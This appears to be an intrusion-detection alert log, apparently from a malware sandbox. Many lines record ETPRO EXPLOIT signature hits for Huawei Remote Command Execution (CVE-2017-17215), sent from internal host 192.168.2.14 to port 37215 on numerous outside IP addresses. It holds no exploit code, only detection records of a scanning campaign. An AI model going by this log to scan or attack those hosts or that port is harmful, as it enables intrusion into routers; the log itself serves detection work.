                                                        06/13/24-21:32:01.224602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180237215192.168.2.14156.144.164.44
                                                        06/13/24-21:32:23.945409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886637215192.168.2.1441.80.154.169
                                                        06/13/24-21:32:25.991834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355037215192.168.2.1441.83.138.200
                                                        06/13/24-21:32:48.554877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360237215192.168.2.14197.150.244.20
                                                        06/13/24-21:32:52.680409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939237215192.168.2.14156.249.242.201
                                                        06/13/24-21:32:36.245997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989637215192.168.2.14156.7.168.195
                                                        06/13/24-21:32:50.629157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612237215192.168.2.14197.73.121.233
                                                        06/13/24-21:32:09.458256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270637215192.168.2.14197.61.213.203
                                                        06/13/24-21:32:13.566046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648837215192.168.2.1441.7.153.221
                                                        06/13/24-21:32:19.727744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077437215192.168.2.14197.105.0.252
                                                        06/13/24-21:32:09.460237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458437215192.168.2.14156.115.192.155
                                                        06/13/24-21:31:59.197613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827837215192.168.2.1441.187.7.24
                                                        06/13/24-21:32:01.224094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585637215192.168.2.14156.140.147.35
                                                        06/13/24-21:31:57.094157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462437215192.168.2.1441.57.153.43
                                                        06/13/24-21:32:03.279007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347637215192.168.2.14156.170.35.32
                                                        06/13/24-21:32:13.569448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628237215192.168.2.14156.249.251.40
                                                        06/13/24-21:32:38.317392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119437215192.168.2.14156.25.156.23
                                                        06/13/24-21:32:54.707421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6063437215192.168.2.1441.77.216.1
                                                        06/13/24-21:33:04.993148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445437215192.168.2.14197.47.248.10
                                                        06/13/24-21:32:21.805792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822837215192.168.2.1441.79.132.235
                                                        06/13/24-21:33:13.213392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440437215192.168.2.14197.185.161.37
                                                        06/13/24-21:32:11.487791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722437215192.168.2.14156.68.112.16
                                                        06/13/24-21:32:03.301119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901437215192.168.2.14197.229.252.255
                                                        06/13/24-21:32:32.154245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.14156.210.177.64
                                                        06/13/24-21:32:28.045128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947037215192.168.2.1441.201.254.139
                                                        06/13/24-21:32:09.452784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098037215192.168.2.1441.228.149.56
                                                        06/13/24-21:32:03.305407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.1441.241.137.195
                                                        06/13/24-21:32:21.782874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.14156.99.212.59
                                                        06/13/24-21:32:05.344267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335037215192.168.2.1441.164.8.152
                                                        06/13/24-21:32:56.786656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695237215192.168.2.1441.2.197.244
                                                        06/13/24-21:32:01.240177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441237215192.168.2.14156.215.111.69
                                                        06/13/24-21:32:15.633237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887637215192.168.2.14197.101.78.2
                                                        06/13/24-21:32:09.456364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076837215192.168.2.14156.4.247.183
                                                        06/13/24-21:32:05.349890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954037215192.168.2.14156.212.33.219
                                                        06/13/24-21:31:59.195961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407037215192.168.2.1441.74.74.126
                                                        06/13/24-21:32:21.802238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194837215192.168.2.1441.87.173.252
                                                        06/13/24-21:32:50.611125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413437215192.168.2.14156.121.118.192
                                                        06/13/24-21:32:13.544639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082237215192.168.2.14197.9.100.236
                                                        06/13/24-21:32:28.046295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422237215192.168.2.14156.144.102.219
                                                        06/13/24-21:32:15.632422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305237215192.168.2.1441.37.216.218
                                                        06/13/24-21:32:17.702545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384037215192.168.2.14197.166.166.74
                                                        06/13/24-21:32:30.097072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942037215192.168.2.1441.94.78.239
                                                        06/13/24-21:32:32.149825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156637215192.168.2.1441.109.73.51
                                                        06/13/24-21:32:38.322088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430437215192.168.2.14197.212.81.79
                                                        06/13/24-21:32:05.349934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097437215192.168.2.14197.98.169.4
                                                        06/13/24-21:32:17.697114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740637215192.168.2.14156.136.131.93
                                                        06/13/24-21:33:11.176911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365237215192.168.2.14156.144.189.4
                                                        06/13/24-21:32:19.749318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322037215192.168.2.1441.103.110.191
                                                        06/13/24-21:33:11.159708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859237215192.168.2.14197.176.219.133
                                                        06/13/24-21:32:15.604307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941037215192.168.2.1441.177.45.15
                                                        06/13/24-21:32:38.322762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803437215192.168.2.14197.180.26.76
                                                        06/13/24-21:33:02.936491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499837215192.168.2.1441.95.147.97
                                                        06/13/24-21:32:01.248607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271437215192.168.2.1441.249.150.45
                                                        06/13/24-21:32:36.246701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292237215192.168.2.1441.74.225.86
                                                        06/13/24-21:32:56.784732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886437215192.168.2.14197.98.150.81
                                                        06/13/24-21:33:09.108916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634637215192.168.2.1441.185.107.109
                                                        06/13/24-21:32:09.455756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322837215192.168.2.1441.6.226.111
                                                        06/13/24-21:32:38.304049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747037215192.168.2.14156.136.94.233
                                                        06/13/24-21:32:56.784328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476437215192.168.2.14197.74.12.159
                                                        06/13/24-21:32:03.306653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381037215192.168.2.1441.0.235.156
                                                        06/13/24-21:32:25.993361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863637215192.168.2.14197.168.131.41
                                                        06/13/24-21:32:32.150521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553437215192.168.2.14156.87.93.92
                                                        06/13/24-21:31:57.129811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626237215192.168.2.14156.230.226.221
                                                        06/13/24-21:33:00.886248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861637215192.168.2.1441.73.207.190
                                                        06/13/24-21:31:57.131707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452037215192.168.2.14197.65.242.5
                                                        06/13/24-21:32:09.457865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014637215192.168.2.14156.160.74.183
                                                        06/13/24-21:32:50.610400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201837215192.168.2.1441.200.58.163
                                                        06/13/24-21:32:56.784051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800237215192.168.2.14156.203.24.250
                                                        06/13/24-21:31:57.132584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018237215192.168.2.1441.138.162.225
                                                        06/13/24-21:32:28.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541837215192.168.2.1441.160.239.68
                                                        06/13/24-21:33:09.106884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060637215192.168.2.14197.233.122.61
                                                        06/13/24-21:32:21.784995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756037215192.168.2.1441.244.239.201
                                                        06/13/24-21:32:38.302676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452437215192.168.2.14197.66.4.28
                                                        06/13/24-21:32:23.834133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151237215192.168.2.1441.11.136.68
                                                        06/13/24-21:32:56.758806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847437215192.168.2.1441.166.101.153
                                                        06/13/24-21:33:15.272691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611037215192.168.2.14197.240.171.117
                                                        06/13/24-21:32:42.408241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471837215192.168.2.14197.205.19.120
                                                        06/13/24-21:32:30.126009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367037215192.168.2.14197.154.92.217
                                                        06/13/24-21:32:01.238209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485237215192.168.2.14197.158.97.75
                                                        06/13/24-21:32:46.501481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531637215192.168.2.1441.162.150.179
                                                        06/13/24-21:32:03.294984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209437215192.168.2.14156.233.152.133
                                                        06/13/24-21:32:48.571711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642237215192.168.2.14156.221.135.168
                                                        06/13/24-21:32:36.248212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363837215192.168.2.14156.155.92.189
                                                        06/13/24-21:32:56.753302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007837215192.168.2.14197.193.32.39
                                                        06/13/24-21:32:03.304309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055437215192.168.2.1441.154.183.230
                                                        06/13/24-21:32:07.417124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480437215192.168.2.1441.105.253.90
                                                        06/13/24-21:32:23.942909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571237215192.168.2.14197.185.21.175
                                                        06/13/24-21:33:07.039168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284437215192.168.2.14197.56.232.9
                                                        06/13/24-21:33:15.259554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.14156.29.147.157
                                                        06/13/24-21:31:57.094004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310037215192.168.2.1441.164.167.64
                                                        06/13/24-21:32:15.606570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687837215192.168.2.14197.44.135.203
                                                        06/13/24-21:32:11.488118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212237215192.168.2.14156.32.202.36
                                                        06/13/24-21:33:04.993634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838037215192.168.2.1441.123.57.3
                                                        06/13/24-21:32:19.753844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550437215192.168.2.14197.194.199.44
                                                        06/13/24-21:32:38.300488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.14197.30.110.72
                                                        06/13/24-21:32:28.026985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308637215192.168.2.1441.129.164.149
                                                        06/13/24-21:32:54.727038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362237215192.168.2.1441.14.23.59
                                                        06/13/24-21:32:44.476499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376837215192.168.2.14197.23.73.86
                                                        06/13/24-21:32:54.711060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.14156.23.198.114
                                                        06/13/24-21:31:59.174216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277237215192.168.2.1441.248.134.251
                                                        06/13/24-21:32:34.216927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.1441.212.10.81
                                                        06/13/24-21:33:02.913993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085237215192.168.2.1441.161.170.158
                                                        06/13/24-21:32:17.674800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668837215192.168.2.14156.65.38.109
                                                        06/13/24-21:32:38.320871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854237215192.168.2.1441.22.58.183
                                                        06/13/24-21:33:15.275113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088437215192.168.2.14197.164.189.192
                                                        06/13/24-21:33:15.275357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.1441.204.170.89
                                                        06/13/24-21:32:23.945589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739637215192.168.2.14156.63.57.187
                                                        06/13/24-21:33:09.128007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999637215192.168.2.14197.217.116.107
                                                        06/13/24-21:33:09.109515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423637215192.168.2.14197.118.6.37
                                                        06/13/24-21:32:25.970341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044037215192.168.2.14197.191.244.142
                                                        06/13/24-21:33:09.087701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839837215192.168.2.1441.61.32.99
                                                        06/13/24-21:31:57.092820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757637215192.168.2.1441.148.174.163
                                                        06/13/24-21:33:09.089118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310837215192.168.2.14156.212.239.239
                                                        06/13/24-21:32:23.940748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928837215192.168.2.14156.202.146.249
                                                        06/13/24-21:32:17.695523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391237215192.168.2.1441.102.220.152
                                                        06/13/24-21:32:23.833161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.14197.117.201.45
                                                        06/13/24-21:32:38.298738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808637215192.168.2.14197.109.236.98
                                                        06/13/24-21:33:15.271494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718837215192.168.2.14156.13.145.155
                                                        06/13/24-21:33:09.108699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.14156.135.53.28
                                                        06/13/24-21:32:23.941128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688037215192.168.2.14156.158.188.189
                                                        06/13/24-21:32:36.242778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581837215192.168.2.1441.107.165.210
                                                        06/13/24-21:32:05.348739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910037215192.168.2.1441.242.79.125
                                                        06/13/24-21:31:57.130412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643037215192.168.2.14156.172.255.70
                                                        06/13/24-21:33:11.160337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175037215192.168.2.1441.101.87.255
                                                        06/13/24-21:33:00.868732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180037215192.168.2.14197.151.251.167
                                                        06/13/24-21:32:17.672413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754037215192.168.2.1441.92.187.102
                                                        06/13/24-21:32:25.978892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196837215192.168.2.14197.62.80.194
                                                        06/13/24-21:32:42.423709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778237215192.168.2.14156.189.244.249
                                                        06/13/24-21:33:15.274887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.14156.142.223.8
                                                        06/13/24-21:32:34.191099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311037215192.168.2.14156.76.12.226
                                                        06/13/24-21:32:30.078696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305237215192.168.2.14197.26.152.44
                                                        06/13/24-21:32:05.377344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336637215192.168.2.1441.21.189.75
                                                        06/13/24-21:32:28.048423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803837215192.168.2.14197.23.61.70
                                                        06/13/24-21:32:07.416142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518437215192.168.2.1441.40.232.196
                                                        06/13/24-21:32:28.027740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.1441.229.153.167
                                                        06/13/24-21:33:17.304788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.1441.58.100.16
                                                        06/13/24-21:32:21.787046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007637215192.168.2.14156.70.145.46
                                                        06/13/24-21:32:23.830619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.14197.34.189.182
                                                        06/13/24-21:32:17.702441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895437215192.168.2.14156.191.215.77
                                                        06/13/24-21:32:42.423421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752837215192.168.2.14156.190.56.89
                                                        06/13/24-21:32:23.830563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697037215192.168.2.14156.11.237.188
                                                        06/13/24-21:32:38.323651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.14197.187.106.148
                                                        06/13/24-21:32:34.214582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.1441.183.166.118
                                                        06/13/24-21:32:58.839525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3986637215192.168.2.14197.124.17.155
                                                        06/13/24-21:33:09.127049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400437215192.168.2.14197.187.38.81
                                                        06/13/24-21:32:01.224141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336437215192.168.2.1441.161.11.142
                                                        06/13/24-21:32:56.754492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875437215192.168.2.14156.18.63.40
                                                        06/13/24-21:32:19.731057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160037215192.168.2.14156.225.128.232
                                                        06/13/24-21:32:28.026167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696237215192.168.2.14156.220.252.24
                                                        06/13/24-21:32:54.727269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068637215192.168.2.14197.233.215.17
                                                        06/13/24-21:32:07.419690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686237215192.168.2.1441.20.111.189
                                                        06/13/24-21:32:17.672846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904237215192.168.2.14156.186.12.139
                                                        06/13/24-21:32:34.217442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121037215192.168.2.14156.162.97.94
                                                        06/13/24-21:32:32.155350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.14197.63.76.90
                                                        06/13/24-21:32:15.609067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144437215192.168.2.14197.50.250.48
                                                        06/13/24-21:32:25.994812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736037215192.168.2.14197.10.97.73
                                                        06/13/24-21:32:56.756444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.1441.9.105.98
                                                        06/13/24-21:33:09.106042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819037215192.168.2.14197.214.84.218
                                                        06/13/24-21:32:34.193348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554237215192.168.2.14197.119.157.96
                                                        06/13/24-21:32:21.799847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544037215192.168.2.14197.99.76.37
                                                        06/13/24-21:33:00.871007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386837215192.168.2.14197.221.23.235
                                                        06/13/24-21:31:59.173835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.14197.126.143.178
                                                        06/13/24-21:32:03.301285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726237215192.168.2.14156.20.198.100
                                                        06/13/24-21:32:07.418094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183237215192.168.2.14156.63.148.78
                                                        06/13/24-21:32:25.996743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412837215192.168.2.14156.58.90.69
                                                        06/13/24-21:32:52.656490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798037215192.168.2.14156.42.241.213
                                                        06/13/24-21:32:44.452569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225037215192.168.2.14197.112.212.167
                                                        06/13/24-21:33:15.270910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344237215192.168.2.14197.229.234.193
                                                        06/13/24-21:32:21.805388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048437215192.168.2.14197.83.228.114
                                                        06/13/24-21:33:07.039171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670637215192.168.2.1441.166.158.235
                                                        06/13/24-21:32:30.097020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.14197.133.131.171
                                                        06/13/24-21:32:44.456736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14156.113.6.135
                                                        06/13/24-21:32:25.992967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751237215192.168.2.14197.107.10.138
                                                        06/13/24-21:32:09.438497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990037215192.168.2.14156.215.223.193
                                                        06/13/24-21:32:30.079476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846837215192.168.2.1441.231.48.15
                                                        06/13/24-21:32:38.300304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776837215192.168.2.1441.116.93.203
                                                        06/13/24-21:32:52.676063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753637215192.168.2.14197.18.42.170
                                                        06/13/24-21:31:59.197023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922237215192.168.2.1441.181.213.184
                                                        06/13/24-21:31:57.091365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535237215192.168.2.14156.190.186.17
                                                        06/13/24-21:32:05.376763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908437215192.168.2.14197.79.154.244
                                                        06/13/24-21:32:17.677612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.14156.121.207.148
                                                        06/13/24-21:32:28.042921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177637215192.168.2.14156.78.29.166
                                                        06/13/24-21:32:52.670066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816037215192.168.2.14197.151.26.155
                                                        06/13/24-21:31:57.135732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344237215192.168.2.14197.214.162.178
                                                        06/13/24-21:32:46.503171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233437215192.168.2.14156.26.149.145
